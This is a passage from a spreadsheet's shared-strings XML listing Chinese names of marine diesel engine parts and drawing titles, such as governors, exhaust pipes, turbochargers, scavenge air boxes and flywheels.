    <t xml:space="preserve">电流/压力转换器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">开关支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">应急运行箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">手柄组合                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防水灯盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">接线数                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转速系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">车钟设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器转速传感器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">转速传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发动机接口单元布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸控制单元布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">辅助控制单元布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">布线                                                </t>
  </si>
  <si>
    <t xml:space="preserve">电缆导管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发动机布线                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制箱位置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子布线                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子附件布线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">观察孔                                               </t>
  </si>
  <si>
    <t xml:space="preserve">泄放阀，排气阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台电路图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">错向面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风机控制设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机电子面板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器电路图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">推荐备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器控制系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">停增压器控制系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器旁通控制系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">桥楼控制设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">桥楼控制要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调节轴装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注燃油泵安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主泵/盖布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调节轴总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分开式接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接头布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧加载控制杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">杠杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">控制杆组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接触臂总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制杆和拉杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">监控设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制设备准备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制器旁通系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PMI系统准备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PMI系统布线                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PMI移动传感器组件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PMI传感器套安装孔                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PMI传感器体安装孔                                        </t>
  </si>
  <si>
    <t xml:space="preserve">加工保护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">伸缩管套齿                                             </t>
  </si>
  <si>
    <t xml:space="preserve">移动传感器接线箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">刮油设备布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油设备准备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油传感器组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">传感器孔刮油堵漏                                          </t>
  </si>
  <si>
    <t xml:space="preserve">刮油接线箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">刮油系统警报箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">刮油传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">间断性润滑布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">间断性润滑转速系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">间断性润滑控制箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">监控设备安装孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平均指示压力系统准备                                        </t>
  </si>
  <si>
    <t xml:space="preserve">传感器适配器组件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">切断阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平均指示压力测量设备                                        </t>
  </si>
  <si>
    <t xml:space="preserve">支臂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧加载拉杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧架载控制杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支架安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">指示和超速布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油限制缸                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平衡臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平衡臂安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调整说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">最大调速器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">P.G调速器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">数字调速器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器促动泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压放大器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器执行器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">UG调速器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">同步设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器冷却器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压泵单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">放大器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">停缸控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器控制杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵组布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器和驱动                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力开关布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器冷却器管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力表组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器驱动组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器+放大器布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电缆布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器传动机构                                           </t>
  </si>
  <si>
    <t xml:space="preserve">白合金轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接头部件安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器驱动安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">调速器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">程序员                                               </t>
  </si>
  <si>
    <t xml:space="preserve">促动泵管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">停车设备安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">超速和气缸安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">一对锥齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">woodward臂                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机控制系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油限制气缸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵装置总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气动控制布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">订单                                                </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单—管子布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">升压器+自动装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制装置布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不带桥楼控制的控制装置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">带桥楼控制的控制装置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">助喷器连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转速安全装备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制系统转换                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制系统组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">VIT控制单元组件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">控制系统单元布线                                          </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-调速器驱动                                        </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-扫气箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸+磁力阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">杆安装                                               </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-压力控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">紧急控制阀支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">制动气缸阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑动套筒组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带管升压器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气动箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀组件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">感应传感器组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">换向启动空气分配器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带盖齿轮箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带轴承齿轮箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带发电机齿轮箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带同步器齿轮箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">超速接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机旁操纵台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-分段支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-装配点                                          </t>
  </si>
  <si>
    <t xml:space="preserve">换向阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主阀布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀+开关布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">负荷传感器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">停车设备布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">减压阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">角度传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">快速关闭阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">升压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">减压阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">行程开关安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力转化器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">最大停车限位螺钉布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油箱布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器组件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气源控制装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">执行器组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器托架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机旁控制箱安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">快速安全阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带臂毂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电气箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">仪表箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气瓶                                               </t>
  </si>
  <si>
    <t xml:space="preserve">应急操纵台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">手柄总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">夹臂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">节流螺钉拧紧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">精调                                                </t>
  </si>
  <si>
    <t xml:space="preserve">发电机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">磁铁支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电位计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">多通阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">定向仪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转速计装备                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机械转速计布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统电子部件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">调整扭                                               </t>
  </si>
  <si>
    <t xml:space="preserve">开关板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统补充                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带活塞顶盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">浮动块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">手轮锁定                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动滑块扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气滑块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气滑块盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气滑块安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">制动气缸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">位置指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器和/或轴端发动机系统                                     </t>
  </si>
  <si>
    <t xml:space="preserve">进气系统布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压系统/PTI系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/PTI系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/RCF系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器管道布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">功率涡轮订单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">RCF/增压器订单                                         </t>
  </si>
  <si>
    <t xml:space="preserve">BWIII/RKAV/增压器订单                                  </t>
  </si>
  <si>
    <t xml:space="preserve">BWIII/GCR订单                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/CFE订单                                         </t>
  </si>
  <si>
    <t xml:space="preserve">RCF订单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器订单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">DMG订单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">BL订单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">GCR订单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">RCF管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">动力涡轮滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">动力涡轮密封空气                                          </t>
  </si>
  <si>
    <t xml:space="preserve">动力涡轮淡水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器干洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器排气管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器控制面板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器说明                                             </t>
  </si>
  <si>
    <t xml:space="preserve">标准说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">信号设备附件接头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">阀和泵的齿轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀和示功阀安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带导块的轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚针轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弯头接合                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功器龙头安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">示功器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">接长杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带包装的螺帽                                            </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条部件清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器供货                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扭矩补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带轴承的刮油环盖                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧器链轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧器调整                                           </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧和数据板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">偏心轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油量调节器螺塞组件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧器保持工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱钢板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器鼻                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱更改                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起吊附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管节流布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空气集管底架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带裙法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">检修孔管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">出口接管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">制动弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">放气设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可选单向阀布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">大小头接管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">测量管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸入管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸油帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风机密封                                             </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">输送管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">输送管护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸入管-T形                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吸油箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸油管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱检修孔盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">进口                                                </t>
  </si>
  <si>
    <t xml:space="preserve">吸油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保护罩                                               </t>
  </si>
  <si>
    <t xml:space="preserve">进气连接块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器箱板子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫器集管+后端管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器框架绝热                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫器集管绝缘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷凝水排泄布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气进口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器护罩                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的排气阀T形管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的排气阀T形管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的中间管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的增压器十字管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的增压器十字管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的T型管上端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的T型管下端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的增压器弯管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的增压器弯管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接格栅的支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接格栅的支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的带格栅的底座                                       </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的带格栅的底座                                       </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器进口绝热                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支承环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管节流管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的管端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔热罩                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀隔热层                                            </t>
  </si>
  <si>
    <t xml:space="preserve">法兰接头绝热                                            </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器详细资料                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管外壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管钢板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全箍                                               </t>
  </si>
  <si>
    <t xml:space="preserve">2，3缸排烟管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">7＋8＋9＃气缸排烟管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">2缸排烟管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">4缸排烟管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">端板安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">4，5，6缸排烟管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">1＃缸排烟管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管补充                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管框架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管液压支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管液压支撑管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器出口排烟管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">框架前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">绝热箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔热装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管防热板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管检修孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓/集管支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">夹紧环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">绝热框架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器管安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">干洗布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷枪                                                </t>
  </si>
  <si>
    <t xml:space="preserve">清洗液容器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器水洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管旁通                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管紧急旁通                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管复合涡轮系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管旁通（绝热）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">2＃气缸排烟管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管各种详述                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器支撑和排烟管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管转接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管前端提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管后端提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管提升用横木                                          </t>
  </si>
  <si>
    <t xml:space="preserve">隔热材料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器底部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀管盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油发电机排气管布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">中间排烟管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器旁通布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">旁通管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">后排烟管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器后排烟管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前后端平衡重布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">前端布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴前端安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带PTO的前端布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">供油单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">供油单元管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调频轮布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮和调频轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮和联轴节安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮液压拉伸器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮防护                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮护罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴护罩翼板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮指针安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拆分式齿轮缘安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">行星齿轮装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">分离装置布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚子布置                                              </t>
  </si>
  <si>
    <t>止动架</t>
